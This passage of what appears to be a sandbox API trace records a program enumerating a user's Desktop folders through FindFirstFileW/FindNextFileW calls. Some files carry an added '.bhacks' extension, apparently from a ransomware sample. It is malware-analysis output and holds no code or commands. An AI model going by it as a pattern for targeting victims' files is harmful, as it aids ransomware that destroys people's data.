ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0065.432] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0065.432] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0065.432] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0065.432] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0065.432] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0065.432] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0065.432] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0065.433] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0065.433] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0065.433] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0065.433] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0065.433] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0065.433] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0065.434] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0065.434] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0065.434] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0065.434] FindClose (in: hFindFile=0x9be6c0 | out: hFindFile=0x9be6c0) returned 1 [0065.434] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.avi", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 0x9be600 [0065.434] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0065.434] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0065.435] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe840 | out: lpFindFileData=0x6fe840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0065.435] FindClose (in: hFindFile=0x9be600 | out: hFindFile=0x9be600) returned 1 [0065.435] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be540 [0065.435] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.435] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0065.435] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0065.435] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0065.436] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0065.436] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0065.436] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0065.436] FindNextFileW (in: hFindFile=0x9be540, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0065.436] FindClose (in: hFindFile=0x9be540 | out: hFindFile=0x9be540) returned 1 [0065.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.avi", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x248f4274, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be600 [0065.437] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x248f4274, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2464586c, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2464586c, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2485b8b7, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb4f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx.bhacks", cAlternateFileName="E2JRFW~1.BHA")) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0065.438] FindClose (in: hFindFile=0x9be600 | out: hFindFile=0x9be600) returned 1 [0065.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.avi", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bed20 [0065.476] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.476] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, 